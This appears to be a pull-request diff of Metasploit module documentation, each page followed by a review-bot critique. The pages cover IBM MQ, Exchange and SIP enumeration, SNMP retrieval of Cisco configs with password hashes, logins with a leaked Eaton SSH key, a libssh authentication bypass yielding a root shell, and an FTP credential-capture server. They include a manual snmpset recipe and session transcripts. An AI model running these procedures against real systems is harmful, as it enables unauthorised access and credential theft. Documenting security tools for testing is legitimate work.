This module can be used to identify a list of usernames that are allowed to connect to the Queue Manager. This module requires the name of a valid server-connection channel, the Queue Manager's name which can be obtained by running the following 2 modules:
|
||||
* ```auxiliary/scanner/misc/ibm_mq_channel_brute```
|
||||
* ```auxiliary/scanner/misc/ibm_mq_enum```
|
||||
After identifying a valid username, MQ Explorer can be used to connect to the Queue Manager using the information gathered.
|
|
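Review bot: Verification Steps number two steps as 5 (`set queue_manager` and `set usernames_file`); renumber them 5 through 9. The template leftover 'Example steps in this format (is also in the PR):' should be removed. In Scenarios, 'requires the name of a valid server-connection channel, the Queue Manager's name which can be obtained' needs an 'and' and a comma. The output again prints the peer twice (`[+] 10.1.1.10:1416 - 10.1.1.10:1416 Valid usernames found`). The setup bullet about removing the CHLAUTH record that denies all users should say this is only to reproduce on a lab Queue Manager, since it weakens the default configuration.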
@ -0,0 +1,59 @@
|
|||
The `java_jmx_scanner` module uses the `Msf::Exploit::Remote::Java::Rmi::Client` library to perform a handshake with a Java JMX MBean server. JMX MBean listens in 1099 by default, and is used to manage and monitor Java applications.
|
||||
|
||||
The module returns whether the target is a Java JMX MBeans server and also outputs if the server requires authentication.
|
||||
|
||||
## Vulnerable Application
|
||||
|
||||
While many implementations of JMX are available, the module was successfully tested against an Apache ActiveMQ 5.13.3 server with JMX enabled. For convenience, a docker container (`antonw/activemq-jmx`) supports JMX and can be tweaked to require authentication.
|
||||
|
||||
## Verification Steps
|
||||
|
||||
See [PR#10401](https://github.com/rapid7/metasploit-framework/pull/10401) for general information, and [this specific comment](https://github.com/rapid7/metasploit-framework/pull/10401#issuecomment-448705897) for steps to require JMX authentication in the container. In summary:
|
||||
|
||||
```
|
||||
docker run -p 1099:1099 antonw/activemq-jmx
|
||||
docker exec -u=root -it `docker ps -q` /bin/bash
|
||||
|
||||
# echo -e "monitorRole QED\ncontrolRole R&D" /etc/java-7-openjdk/management/jmxremote.password
|
||||
# chown activemq /etc/java-7-openjdk/management/jmxremote.password
|
||||
# chmod 400 /etc/java-7-openjdk/management/jmxremote.password
|
||||
# sed 's/-Dcom.sun.management.jmxremote.authenticate=false/-Dcom.sun.management.jmxremote.authenticate=true/' /opt/apache-activemq-5.13.3/bin/env
|
||||
|
||||
docker restart `docker ps -q`
|
||||
```
|
||||
|
||||
## Options
|
||||
|
||||
**Option name**
|
||||
|
||||
Talk about what it does, and how to use it appropriately. If the default value is likely to change, include the default value here.
|
||||
|
||||
## Scenarios
|
||||
|
||||
### ActiveMQ 5.13.3
|
||||
|
||||
Against the above-described Docker container, the workflow looks like:
|
||||
|
||||
```
|
||||
msf5 auxiliary(scanner/misc/java_jmx_server) > set RHOST 127.0.0.1
|
||||
msf5 auxiliary(scanner/misc/java_jmx_server) > set RPORT 1099
|
||||
msf5 auxiliary(scanner/misc/java_jmx_server) > run
|
||||
[*] Reloading module...
|
||||
|
||||
[*] 127.0.0.1:1099 - Sending RMI header...
|
||||
[*] 127.0.0.1:1099 - localhost:1099 Java JMX MBean authentication required
|
||||
[*] 127.0.0.1:1099 - Scanned 1 of 1 hosts (100% complete)
|
||||
[*] Auxiliary module execution completed
|
||||
```
|
||||
|
||||
In addition, note that `services` within the data model has been updated:
|
||||
|
||||
```
|
||||
msf5 auxiliary(scanner/misc/java_jmx_server) > services
|
||||
Services
|
||||
========
|
||||
|
||||
host port proto name state info
|
||||
---- ---- ----- ---- ----- ----
|
||||
127.0.0.1 1099 tcp java-rmi open JMX MBean server accessible
|
||||
```
|
|
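Review bot: the container setup commands do not do what the text says. `echo -e "monitorRole QED\ncontrolRole R&D" /etc/java-7-openjdk/management/jmxremote.password` has no `>` redirection, so it prints the path rather than writing the file, and the `sed 's/-Dcom.sun.management.jmxremote.authenticate=false/.../' /opt/apache-activemq-5.13.3/bin/env` line lacks `-i`, so the env file is never changed and `docker restart` comes back with authentication still disabled. Suggested: `echo -e "monitorRole QED\ncontrolRole R&D" > /etc/java-7-openjdk/management/jmxremote.password` and `sed -i 's/-Dcom.sun.management.jmxremote.authenticate=false/-Dcom.sun.management.jmxremote.authenticate=true/' /opt/apache-activemq-5.13.3/bin/env`. Also: the Options section is the unfilled template ('**Option name** Talk about what it does...'), the intro names the module `java_jmx_scanner` while the transcript uses `auxiliary/scanner/misc/java_jmx_server`, the transcript sets `RHOST` for a scanner module, and `[*] Reloading module...` is development residue.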
@ -0,0 +1,21 @@
|
|||
OWA (Outlook Webapp) is vulnerable to time-based user enumeration attacks.
|
||||
This module leverages all known, and even some lesser-known services exposed by default
|
||||
Exchange installations to enumerate email.
|
||||
|
||||
Error-based user enumeration for Office 365 integrated email addresses
|
||||
|
||||
## Verification
|
||||
|
||||
- Start `msfconsole`
|
||||
- `use auxiliary/scanner/msmail/exchange_enum`
|
||||
- `set (`EMAIL` or `EMAIL_FILE`)`
|
||||
- `run`
|
||||
- `creds`
|
||||
|
||||
*Results should look something like below if valid users were found:*
|
||||
|
||||
```
|
||||
host origin service public private realm private_type
|
||||
---- ------ ------- ------ ------- ----- ------------
|
||||
<ip> <ip> 443/tcp (owa) chris@somecompany.com
|
||||
```
|
|
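Review bot: the step '`set (`EMAIL` or `EMAIL_FILE`)`' nests backticks and will not render; write it as `set EMAIL <address>` or `set EMAIL_FILE <path>`. The opening paragraph describes time-based enumeration against on-prem Exchange, but the next sentence says this module does error-based enumeration for Office 365 integrated addresses; lead with that and drop the generic paragraph shared with the other msmail docs. The sample `creds` output records `<ip>` as host and origin with service `443/tcp (owa)`, yet no RHOSTS step is listed; state which host the Office 365 variant records.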
@ -0,0 +1,42 @@
OWA (Outlook Webapp) is vulnerable to time-based user enumeration attacks.
This module leverages all known, and even some lesser-known services exposed by default
Exchange installations to enumerate users. It also targets Office 365 for error-based user enumeration.

**Identify Command**
- Used for gathering information about a host that may be pointed towards an Exchange or o365 tied domain
- Queries for specific DNS records related to Office 365 integration
- Attempts to extract internal domain name for onprem instance of Exchange
- Identifies services vulnerable to time-based user enumeration for onprem Exchange
- Lists password-sprayable services exposed for onprem Exchange host

**Note:** Currently uses RHOSTS which resolves to an IP which is NOT desired, this is currently being fixed

## Verification

- Start `msfconsole`
- `use auxiliary/scanner/msmail/host_id`
- `set RHOSTS <target>`
- `run`

*Results should look like below:*

```
msf5 > use auxiliary/scanner/msmail/host_id
msf5 auxiliary(scanner/msmail/host_id) > set RHOSTS <host>
RHOSTS => <host>
msf5 auxiliary(scanner/msmail/host_id) > run

[*] Running for <ip>...
[*] Attempting to harvest internal domain:
[*] Internal Domain:
[*] <domain>
[*] [-] Domain is not using o365 resources.
[*] Identifying endpoints vulnerable to time-based enumeration:
[*] [+] https://<host>/Microsoft-Server-ActiveSync
[*] [+] https://<host>/autodiscover/autodiscover.xml
[*] [+] https://<host>/owa
[*] Identifying exposed Exchange endpoints for potential spraying:
[*] [+] https://<host>/oab
[*] [+] https://<host>/ews

```

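Review bot: the **Note** admits that RHOSTS resolves to an IP where the module needs a name, and the bullets describe DNS lookups for Office 365 records and internal-domain harvesting, so a reader following `set RHOSTS <target>` cannot tell whether to supply a hostname or an address; state the expected input explicitly and link the tracking issue instead of shipping "this is currently being fixed" in the doc. The sample output shows doubled tags such as `[*] [-] Domain is not using o365 resources.` and `[*] [+] https://<host>/owa`, which looks like hand-formatted `[+]`/`[-]` strings passed through the status printer; use the good/error printers so the tags are not duplicated. Minor: the section is headed **Identify Command** although the module is `host_id`, "onprem" should be "on-prem", and the sample output ends with an empty line inside the fence.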
@ -0,0 +1,25 @@
OWA (Outlook Webapp) is vulnerable to time-based user enumeration attacks.
This module leverages all known, and even some lesser-known services exposed by default
Exchange installations to enumerate users. It also targets Office 365 for error-based user enumeration.

- Error-based user enumeration for on premise Exchange services

**Note:** Currently uses RHOSTS which resolves to an IP which is NOT desired, this is currently being fixed

## Verification

- Start `msfconsole`
- `use auxiliary/scanner/msmail/onprem_enum`
- `set RHOSTS <target>`
- `set (`USER` or `USER_FILE`)
- `run`
- `creds`

*Results should look something like below if valid users were found:*

```
host origin service public private realm private_type
---- ------ ------- ------ ------- ----- ------------
10.1.1.1 10.1.1.1 443/tcp (owa)
10.1.1.1 10.1.1.1 443/tcp (owa) chris
```

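Review bot: `set (`USER` or `USER_FILE`)` has unbalanced backticks (the opening one is never closed) and, as in the other msmail docs, should be written as `set USER <name>` or `set USER_FILE <path>`. The expected `creds` output contains a row `10.1.1.1 10.1.1.1 443/tcp (owa)` with no public value next to the valid `chris` row, i.e. an empty credential is being recorded; either explain what that blank row represents or stop storing an entry with no username. The description's first sentence says "time-based" while the bullet says this module does error-based enumeration; reconcile them. Wording: "on premise" should read "on-premises", and the RHOSTS note should reference the tracking issue.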
@ -0,0 +1,47 @@
## Vulnerable Application

SIP is a signaling protocol for voice, and video typically associated with VOIP and typically used in commercial
phone systems. SIP and VOIP are gaining popularity with home and cellular voice/video calling systems as well.

This module scans the TCP port to identify what OPTIONS are available on the SIP service.

## Verification Steps

1. Start msfconsole
2. Do: ```use auxiliary/scanner/sip/options_tcp```
3. Do: ```set rhosts [ip]```
4. Do: ```run```

## Scenarios

### Cisco UC520


```
msf5 > use auxiliary/scanner/sip/options_tcp
msf5 auxiliary(scanner/sip/options_tcp) > set rhosts 2.2.2.2
rhosts => 2.2.2.2
msf5 auxiliary(scanner/sip/options_tcp) > run

[*] 2.2.2.2:5060 - 2.2.2.2:5060 tcp SIP/2.0 200 OK: {"Server"=>"Cisco-SIPGateway/IOS-12.x", "Allow"=>"INVITE, OPTIONS, BYE, CANCEL, ACK, PRACK, UPDATE, REFER, SUBSCRIBE, NOTIFY, INFO, REGISTER"}
[*] 2.2.2.2:5060 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```

## Confirming using NMAP

Utilizing the [sip-methods](https://nmap.org/nsedoc/scripts/sip-methods.html) script

```
nmap --script=sip-methods -p 5060 2.2.2.2

Starting Nmap 7.70 ( https://nmap.org ) at 2018-10-11 15:44 EDT
Nmap scan report for 2.2.2.2
Host is up (0.0036s latency).

PORT STATE SERVICE
5060/tcp open sip
|_sip-methods: INVITE, OPTIONS, BYE, CANCEL, ACK, PRACK, UPDATE, REFER, SUBSCRIBE, NOTIFY, INFO, REGISTER
MAC Address: 00:1B:8F:AA:AA:AA (Cisco Systems)
```

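Review bot: "scans the TCP port to identify what OPTIONS are available" misdescribes what the scenario shows: the module sends a SIP OPTIONS request over TCP and reports the methods the server advertises in its `Allow` header (the Nmap sip-methods output lists the same method set), so say that. There is no Options section even though the scenario runs against 5060 by default; document RPORT, since SIP is commonly moved off the default port. In the sample output the target appears twice in `[*] 2.2.2.2:5060 - 2.2.2.2:5060 tcp SIP/2.0 200 OK`, which looks like the peer prefix is being added both by the message text and by the printer. Wording: "voice, and video" has a stray comma and VOIP is conventionally written VoIP.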
@ -0,0 +1,143 @@
## Vulnerable Application

Cisco IOS devices can be configured to back-up their running and startup configurations via SNMP.
This is a well [documented](https://www.cisco.com/c/en/us/support/docs/ip/simple-network-management-protocol-snmp/15217-copy-configs-snmp.html#copying_startup)
feature of IOS and many other networking devices, and is part of an administrator functionality.
A read-write community string is required, as well as a tftp server (metasploit includes one).
After the config has been copied, the SNMP paramters are deleted.

## Verification Steps

1. Enable SNMP with a read/write community string on IOS: `snmp-server community private rw`
2. Start msfconsole
3. Do: ```use auxiliary/scanner/snmp/cisco_config_tftp```
4. Do: ```set COMMUNITY [read-write snmp]```
5. Do: ```set rhosts [ip]```
6. Do: ```run```

## Options

**COMMUNITY**

The SNMP community string to use which must be read-write. Default is `public`.

## Scenarios

### Cisco UC520-8U-4FXO-K9 running IOS 12.4

```
msf5 > setg rhosts 2.2.2.2
rhosts => 2.2.2.2
msf5 > use auxiliary/scanner/snmp/cisco_config_tftp
msf5 auxiliary(scanner/snmp/cisco_config_tftp) > set community private
community => private
msf5 auxiliary(scanner/snmp/cisco_config_tftp) > run

[*] Starting TFTP server...
[*] Scanning for vulnerable targets...
[*] Trying to acquire configuration from 2.2.2.2...
[*] Scanned 1 of 1 hosts (100% complete)
[*] Providing some time for transfers to complete...
[*] Incoming file from 2.2.2.2 - 2.2.2.2.txt 22831 bytes
[+] 2.2.2.2:161 MD5 Encrypted Enable Password: $1$TF.y$3E7pZ2szVvQw5JG8SDjNa1
[+] 2.2.2.2:161 Username 'cisco' with MD5 Encrypted Password: $1$DaqN$iP32E5WcOOui/H66R63QB0
[+] 2.2.2.2:161 SNMP Community (RO): public
[+] 2.2.2.2:161 SNMP Community (RW): private
[*] Shutting down the TFTP service...
[*] Auxiliary module execution completed
```

### Manual Interaction
This process can also be executed manually utilizing Metasploit's TFTP server.
Cisco's [documentation](https://www.cisco.com/c/en/us/support/docs/ip/simple-network-management-protocol-snmp/15217-copy-configs-snmp.html#copying_startup)
was utilized to create this process.

1. Start the TFTP server

```
msf5 > use auxiliary/server/tftp
msf5 auxiliary(server/tftp) > run
[*] Auxiliary module running as background job 0.
msf5 auxiliary(server/tftp) >
[*] Starting TFTP server on 0.0.0.0:69...
[*] Files will be served from /tmp
[*] Uploaded files will be saved in /tmp
```

2. Execute the SNMP commands. An integer is required to group the requests together, `666` is used in this example.

```
msf5 auxiliary(server/tftp) > snmpset -v 1 -c private 2.2.2.2 .1.3.6.1.4.1.9.9.96.1.1.1.1.2.666 i 1
[*] exec: snmpset -v 1 -c private 2.2.2.2 .1.3.6.1.4.1.9.9.96.1.1.1.1.2.666 i 1

iso.3.6.1.4.1.9.9.96.1.1.1.1.2.666 = INTEGER: 1
msf5 auxiliary(server/tftp) > snmpset -v 1 -c private 2.2.2.2 .1.3.6.1.4.1.9.9.96.1.1.1.1.3.666 i 4
[*] exec: snmpset -v 1 -c private 2.2.2.2 .1.3.6.1.4.1.9.9.96.1.1.1.1.3.666 i 4

iso.3.6.1.4.1.9.9.96.1.1.1.1.3.666 = INTEGER: 4
msf5 auxiliary(server/tftp) > snmpset -v 1 -c private 2.2.2.2 .1.3.6.1.4.1.9.9.96.1.1.1.1.4.666 i 1
[*] exec: snmpset -v 1 -c private 2.2.2.2 .1.3.6.1.4.1.9.9.96.1.1.1.1.4.666 i 1

iso.3.6.1.4.1.9.9.96.1.1.1.1.4.666 = INTEGER: 1
msf5 auxiliary(server/tftp) > snmpset -v 1 -c private 2.2.2.2 .1.3.6.1.4.1.9.9.96.1.1.1.1.5.666 a "1.1.1.1"
[*] exec: snmpset -v 1 -c private 2.2.2.2 .1.3.6.1.4.1.9.9.96.1.1.1.1.5.666 a "1.1.1.1"

iso.3.6.1.4.1.9.9.96.1.1.1.1.5.666 = IpAddress: 1.1.1.1
msf5 auxiliary(server/tftp) > snmpset -v 1 -c private 2.2.2.2 .1.3.6.1.4.1.9.9.96.1.1.1.1.6.666 s "backup_config"
[*] exec: snmpset -v 1 -c private 2.2.2.2 .1.3.6.1.4.1.9.9.96.1.1.1.1.6.666 s "backup_config"

iso.3.6.1.4.1.9.9.96.1.1.1.1.6.666 = STRING: "backup_config"
msf5 auxiliary(server/tftp) > snmpset -v 1 -c private 2.2.2.2 .1.3.6.1.4.1.9.9.96.1.1.1.1.14.666 i 1
[*] exec: snmpset -v 1 -c private 2.2.2.2 .1.3.6.1.4.1.9.9.96.1.1.1.1.14.666 i 1

iso.3.6.1.4.1.9.9.96.1.1.1.1.14.666 = INTEGER: 1
```

3. At this point the config is transferring, we need to wait a few seconds. Lastly, we'll remove `666` from the system.

```
msf5 auxiliary(server/tftp) > snmpset -v 1 -c private 2.2.2.2 .1.3.6.1.4.1.9.9.96.1.1.1.1.14.666 i 6
[*] exec: snmpset -v 1 -c private 2.2.2.2 .1.3.6.1.4.1.9.9.96.1.1.1.1.14.666 i 6

iso.3.6.1.4.1.9.9.96.1.1.1.1.14.666 = INTEGER: 6
```

4. Confirm we have our config file

```
msf5 auxiliary(server/tftp) > ls -lah /tmp/backup_config
[*] exec: ls -lah /tmp/backup_config

-rw-r--r-- 1 root root 23K Oct 11 22:20 /tmp/backup_config
```

## Confirming using NMAP

Utilizing the [snmp-ios-config](https://nmap.org/nsedoc/scripts/snmp-ios-config.html) script

```
nmap -sU -p 161 --script snmp-ios-config --script-args creds.snmp=:private 192.168.2.239
Starting Nmap 7.70 ( https://nmap.org ) at 2018-10-11 22:30 EDT
Nmap scan report for 192.168.2.239
Host is up (0.0034s latency).

PORT STATE SERVICE
161/udp open snmp
| snmp-ios-config:
| !
| ! Last configuration change at 18:01:46 PST Fri Jan 7 2000 by cisco
| ! NVRAM config last updated at 06:07:55 PST Tue Jan 4 2000 by cisco
| !
| version 12.4
| parser config cache interface
| no service pad
| service timestamps debug datetime msec
| service timestamps log datetime msec
| no service password-encryption
| service internal
| service compress-config
| service sequence-numbers
| !
| hostname UC520
...sip...
```

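Review bot: the COMMUNITY option documents `public` as the default in the same sentence that says the string must be read-write; `public` is the conventional read-only name, so the module cannot work with its default and the doc should say the option effectively must be set (the scenario sets `private`). In Manual Interaction step 2 the six snmpset calls are given without saying what each column of `.1.3.6.1.4.1.9.9.96.1.1.1.1.N.666` means; annotate them from the linked Cisco document, which describes this table (CISCO-CONFIG-COPY-MIB ccCopyTable: .2 protocol, .3 source file type, .4 destination file type, .5 server address, .6 file name, .14 row status, where `i 1` activates the row and `i 6` destroys it), so readers see that 666 is the row index rather than a magic number. Step 3 is a comma splice ("the config is transferring, we need to wait") and could point at the table's copy-state column instead of a fixed sleep. The Nmap confirmation targets 192.168.2.239 whereas every other example uses 2.2.2.2; use one address. Typos: "paramters", "metasploit" should be capitalised, and "is part of an administrator functionality" reads better as "is part of normal administrative functionality".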
@ -0,0 +1,49 @@
## Vulnerable Application

Cisco IOS devices can be configured to retrieve, via tftp, a file via SNMP.
This is a well [documented](https://www.cisco.com/c/en/us/support/docs/ip/simple-network-management-protocol-snmp/15217-copy-configs-snmp.html#copying_startup)
feature of IOS and many other networking devices, and is part of an administrator functionality.
A read-write community string is required, as well as a tftp server (metasploit includes one).
The file will be saved to `flash:`.

## Verification Steps

1. Enable SNMP with a read/write community string on IOS: `snmp-server community private rw`
2. Start msfconsole
3. Do: ```use auxiliary/scanner/snmp/cisco_upload_file```
4. Do: ```set COMMUNITY [read-write snmp]```
5. Do: ```set rhosts [ip]```
6. Do: ```set source [file]```
7. Do: ```run```

## Options

**COMMUNITY**

The SNMP community string to use which must be read-write. Default is `public`.

**SOURCE**

The location of the source file to be uploaded to the Cisco device.

## Scenarios

### Cisco UC520-8U-4FXO-K9 running IOS 12.4

```
msf5 > setg rhosts 2.2.2.2
rhosts => 2.2.2.2
msf5 > use auxiliary/scanner/snmp/cisco_upload_file
msf5 auxiliary(scanner/snmp/cisco_upload_file) > set source /tmp/backup_config2
source => /tmp/backup_config2
msf5 auxiliary(scanner/snmp/cisco_upload_file) > set community private
community => private
msf5 auxiliary(scanner/snmp/cisco_upload_file) > run

[*] Starting TFTP server...
[*] Copying file backup_config2 to 2.2.2.2...
[*] Scanned 1 of 1 hosts (100% complete)
[*] Providing some time for transfers to complete...
[*] Shutting down the TFTP service...
[*] Auxiliary module execution completed
```

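Review bot: "can be configured to retrieve, via tftp, a file via SNMP" has a doubled "via"; say that a read-write SNMP community allows the copy table to be used to pull a file from a TFTP server into `flash:`. The description states the destination is `flash:` but not the file name; the scenario's `Copying file backup_config2 to 2.2.2.2` suggests the basename of SOURCE is used, so state that. Unlike the cisco_config_tftp doc there is no confirmation step: the module only reports that the transfer was started, so the doc should show how to verify the file exists on the device (`dir flash:` on the IOS console) before declaring success. COMMUNITY has the same read-only `public` default problem noted on cisco_config_tftp, and "metasploit" should be capitalised.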
@ -0,0 +1,39 @@
# Description

The `eaton_xpert_backdoor` module scans for Eaton Xpert Power meters with a vendor SSH private key used in the device firmware's build process.

## Vulnerable Application

Eaton is a power management company with a wide range of power management products.
Power meters sold by Eaton used a firmware build process for many years that left a developer key pair in the default profile.
Specific models include: Power Xpert Meter 4000/6000/8000

[Software Link](http://www.eaton.com/Eaton/ProductsServices/Electrical/ProductsandServices/PowerQualityandMonitoring/PowerandEnergyMeters/PowerXpertMeter400060008000/index.htm#tabs-2)

Vulnerable Version: Firmware <= 12.x and <= 13.3.x.x and below more versions may be impacted

Tested on: Firmware 12.1.9.1 and 13.3.2.10

Similar to running: `ssh -m hmac-sha1 -c aes128-cbc -o KexAlgorithms=diffie-hellman-group1-sha1 -o HostKeyAlgorithms=ssh-rsa -i ./id_rsa admin@1.1.1.2`

## Verification Steps

1. Start `msfconsole`
2. `use auxiliary/scanner/ssh/eaton_xpert_backdoor`
3. `set RHOSTS 1.1.1.2`
4. `run -z`
5. Vulnerable hosts should present a shell

## Scenarios

```
msf > use auxiliary/scanner/ssh/eaton_xpert_backdoor
msf auxiliary(scanner/ssh/eaton_xpert_backdoor) > set RHOSTS 1.1.1.2
RHOSTS => 1.1.1.2
msf auxiliary(scanner/ssh/eaton_xpert_backdoor) > run -z

[+] 1.1.1.2:22 - Logged in as admin
[*] Command shell session 1 opened (1.1.1.1:62063 -> 1.1.1.2:22) at 2018-08-31 19:12:21 -0400
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```

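Review bot: "Vulnerable Version: Firmware <= 12.x and <= 13.3.x.x and below more versions may be impacted" is garbled; write the version range as one clause ("Firmware <= 12.x and <= 13.3.x.x") and put "other versions may be impacted" in a second sentence, since the tested-on line (12.1.9.1 and 13.3.2.10) is the only precise data. The product name is inconsistent: "Eaton Xpert Power meters" in the description versus "Power Xpert Meter 4000/6000/8000" in the model list and PowerXpertMeter in the linked URL. The `ssh` comparison line pins legacy algorithms (hmac-sha1, aes128-cbc, diffie-hellman-group1-sha1, ssh-rsa) without saying why; state that the device only offers these, which is what a reader needs to understand why the module negotiates them. The doc also gives no remediation or vendor advisory reference; if Eaton has published fixed firmware, link it.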
@ -0,0 +1,167 @@
## Intro

This module exploits an authentication bypass in libssh server code
where a `USERAUTH_SUCCESS` message is sent in place of the expected
`USERAUTH_REQUEST` message. libssh versions 0.6.0 through 0.7.5 and
0.8.0 through 0.8.3 are vulnerable.

Note that this module's success depends on whether the server code
can trigger the correct (`shell`/`exec`) callbacks despite only the state
machine's authenticated state being set.

Therefore, you may or may not get a shell if the server requires
additional code paths to be followed.

## Setup

1. `git clone git://git.libssh.org/projects/libssh.git`
2. `cd libssh` and `git checkout libssh-0.8.3`
3. `git apply -p1 /path/to/metasploit-framework/external/source/libssh/ssh_server_fork.patch`
4. Follow the steps in `INSTALL` to build libssh
5. Run `build/examples/ssh_server_fork` (I like to `strace` it)

## Actions

```
Name Description
---- -----------
Execute Execute a command
Shell Spawn a shell
```

## Options

**CMD**

Set this to a command or shell you want to execute. An `exec` channel
request will be sent instead of a `shell` channel request.

**SPAWN_PTY**

Enable this if you would like a PTY. Some server implementations may
require this. Note that you WILL be logged in `utmp`, `wtmp`, and
`lastlog` in most cases.

**CHECK_BANNER**

This is a banner check for libssh. It's not sophisticated, and the
banner may be changed, but it may prevent false positives due to how the
OOB authentication packet always returns `true`.

## Usage

Positive testing against unpatched libssh 0.8.3:

```
msf5 > use auxiliary/scanner/ssh/libssh_auth_bypass
msf5 auxiliary(scanner/ssh/libssh_auth_bypass) > set rhosts 172.28.128.3
rhosts => 172.28.128.3
msf5 auxiliary(scanner/ssh/libssh_auth_bypass) > set rport 2222
rport => 2222
msf5 auxiliary(scanner/ssh/libssh_auth_bypass) > set spawn_pty true
spawn_pty => true
msf5 auxiliary(scanner/ssh/libssh_auth_bypass) > set verbose true
verbose => true
msf5 auxiliary(scanner/ssh/libssh_auth_bypass) > run

[*] 172.28.128.3:2222 - Attempting authentication bypass
[+] 172.28.128.3:2222 - SSH-2.0-libssh_0.8.3 appears to be unpatched
[*] Command shell session 1 opened (172.28.128.1:56981 -> 172.28.128.3:2222) at 2018-10-19 12:38:24 -0500
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/ssh/libssh_auth_bypass) > sessions -1
[*] Starting interaction with 1...

# id
id
uid=0(root) gid=0(root) groups=0(root)
# uname -a
uname -a
Linux ubuntu-xenial 4.4.0-134-generic #160-Ubuntu SMP Wed Aug 15 14:58:00 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
# tty
tty
/dev/pts/1
#
```

Positive testing of shell commands using the `Execute` action:

```
msf5 auxiliary(scanner/ssh/libssh_auth_bypass) > set action Execute
action => Execute
msf5 auxiliary(scanner/ssh/libssh_auth_bypass) > set cmd id; uname -a
cmd => id; uname -a
msf5 auxiliary(scanner/ssh/libssh_auth_bypass) > run

[*] 172.28.128.3:2222 - Attempting authentication bypass
[+] 172.28.128.3:2222 - SSH-2.0-libssh_0.8.3 appears to be unpatched
[*] 172.28.128.3:2222 - Executed: id; uname -a
uid=0(root) gid=0(root) groups=0(root)
Linux ubuntu-xenial 4.4.0-134-generic #160-Ubuntu SMP Wed Aug 15 14:58:00 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/ssh/libssh_auth_bypass) >
```

Negative testing against patched libssh 0.8.4:

```
msf5 auxiliary(scanner/ssh/libssh_auth_bypass) > run

[*] 172.28.128.3:2222 - Attempting authentication bypass
[-] 172.28.128.3:2222 - SSH-2.0-libssh_0.8.4 appears to be patched
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/ssh/libssh_auth_bypass) >
```

Negative testing against an insufficiently implemented libssh server:

```
msf5 auxiliary(scanner/ssh/libssh_auth_bypass) > run

[*] 172.28.128.3:2222 - Attempting authentication bypass
[+] 172.28.128.3:2222 - SSH-2.0-libssh_0.8.3 appears to be unpatched
[-] 172.28.128.3:2222 - Net::SSH::ChannelOpenFailed: Session channel open failed (1)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/ssh/libssh_auth_bypass) > run

[*] 172.28.128.3:2222 - Attempting authentication bypass
[+] 172.28.128.3:2222 - SSH-2.0-libssh_0.8.3 appears to be unpatched
[-] 172.28.128.3:2222 - Net::SSH::ChannelRequestFailed: Shell/exec channel request failed
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/ssh/libssh_auth_bypass) >
```

Negative testing against OpenSSH:

```
msf5 auxiliary(scanner/ssh/libssh_auth_bypass) > set rport 22
rport => 22
msf5 auxiliary(scanner/ssh/libssh_auth_bypass) > run

[*] 172.28.128.3:22 - Attempting authentication bypass
[-] 172.28.128.3:22 - SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.4 does not appear to be libssh
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/ssh/libssh_auth_bypass) >
```

Confirming auth is still normally present using the OpenSSH client:

```
wvu@kharak:~$ ssh -vp 2222 -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null myuser@172.28.128.3
[snip]
debug1: Authentications that can continue: password
debug1: Next authentication method: password
myuser@172.28.128.3's password: wrongpassword
debug1: Authentications that can continue: password
Permission denied, please try again.
myuser@172.28.128.3's password: mypassword
debug1: Authentication succeeded (password).
Authenticated to 172.28.128.3 ([172.28.128.3]:2222).
[snip]
#
```

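Review bot: in the "insufficiently implemented libssh server" transcript the module prints `[+] 172.28.128.3:2222 - SSH-2.0-libssh_0.8.3 appears to be unpatched` and then fails with `ChannelOpenFailed` or `ChannelRequestFailed`; the `[+]` is awarded on the banner alone, before the bypass has been exercised, and the CHECK_BANNER text itself says the banner "may be changed". Report "unpatched" only once the session channel request succeeds, or word the banner result as "banner indicates a vulnerable version" so the success line cannot be a false positive. The Intro lists the vulnerable ranges (0.6.0 through 0.7.5, 0.8.0 through 0.8.3) but cites no advisory or CVE identifier; add the reference. Setup step 3: `git apply` strips one path component by default, so `-p1` is redundant (harmless). In the closing OpenSSH-client transcript the typed passwords (`wrongpassword`, `mypassword`) appear inline although ssh does not echo them; mark the transcript as edited or drop the values.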
@ -0,0 +1,21 @@
## Vulnerable Application

Many devices produced by Ubiquiti are affected by this issue.

## Verification Steps

1. Locate a network known or suspected to house Ubiquiti devices
2. Start msfconsole
3. Do: `use auxiliary/scanner/ubiquiti_discovery`
4. Do: `set RHOSTS <some_targets>`
5. Do: `run`

## Scenarios

An example run against a Ubiquiti EdgeRouter-X:


```
msf5 auxiliary(scanner/ubiquiti/ubiquiti_discover) > run
[+] 192.168.1.1:10001 Ubiquiti Discovery metadata: {"ips"=>["192.168.0.1", "192.168.1.1"], "macs"=>["80:2a:a8:df:aa:bb", "f8:1e:df:f8:aa:bb"], "name"=>"ubnt", "model_short"=>"ER-X", "firmware"=>"EdgeRouter.ER-e50.v1.9.7+hotfix.4.5024279.171006.0255"}
```

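Review bot: the module path differs between the verification step (`use auxiliary/scanner/ubiquiti_discovery`) and the scenario prompt (`auxiliary(scanner/ubiquiti/ubiquiti_discover)`); one of them is wrong and the doc cannot be followed as written. "Many devices produced by Ubiquiti are affected by this issue" never says what the issue is; from the output, the module queries the Ubiquiti discovery service on port 10001 (UDP) and receives device metadata (IP addresses, MAC addresses, hostname, model, firmware string), so describe that, and add what it means for an operator (the discovery service should be disabled or filtered where it is not needed). The MAC addresses in the sample output end in `aa:bb`, which reads as redaction; say so rather than leaving it looking like real data.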
@ -0,0 +1,170 @@
This module creates a mock FTP server which accepts credentials before throwing a `500` error.

## Verification Steps

1. Start msfconsole
2. Do: ```use auxiliary/server/capture/ftp```
3. Do: ```run```

## Options

**BANNER**

The Banner which should be displayed (200 server message). Default is `FTP Server Ready`.
Some notable banners to emulate:

* `Microsoft FTP Service`
* `ucftpd FTP server ready.`
* `Serv-U FTP Server v6.4 for WinSock ready...`
* `Serv-U FTP Server v15.0 ready...`
